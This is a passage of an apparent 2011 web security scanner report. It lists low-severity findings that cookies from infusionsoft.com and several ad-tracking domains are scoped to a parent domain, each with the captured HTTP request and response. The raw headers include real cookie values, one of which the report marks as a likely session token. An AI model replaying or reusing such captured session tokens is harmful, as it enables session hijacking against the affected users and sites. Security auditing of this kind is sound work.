<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

17.3. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...

17.4. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=350803&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ajnvJOOlequ6ZabprMfqfV26NfKOAI7gMhI2SrRuFTy7sA4YRZbRSpuwxALtucRJVryeu8FfS5JQS0stFnbXWVIvrD2BRyJhyD3LRPcAsHrCtGn3fd3NJZdPAQp

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aRnxJ5PME7p7mKvCiExjKLAjBpsnqZceiWcPrfPUdZatasIB1dPc09TGxaSirWQh0IkE9C0EeZdvCFDQJyDQuCjyBgvaIKoP7xkSgVM3UvU4QI73K7U0LSrVZdorDojZdnJY4wk06UhIDZd9G8; path=/; domain=.tribalfusion.com; expires=Sun, 24-Jul-2011 00:52:34 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

17.5. http://ace-tag.advertising.com/action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ace-tag.advertising.com
Path:   /action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2 HTTP/1.1
Host: ace-tag.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; C2=ZGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpxhVJ9IsuoGH2kQhANZXAcs6OCBMnBwB; GUID=MTMwMzY5MTY3MzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 00:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Set-Cookie: C2=iGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpxhVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAH; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Set-Cookie: F1=BIaw02E; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Set-Cookie: ROLL=boAno2yqJFBg26I!; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 25 Apr 2011 00:34:42 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

17.6. http://action.mathtag.com/mm//TRAN//red  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm//TRAN//red

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm//TRAN//red?nm=TrueCHPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=7069007 HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303663821

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 25 Apr 2011 00:50:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1303692621; domain=.mathtag.com; path=/; expires=Tue, 24-Apr-2012 00:50:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

17.7. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...

17.8. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
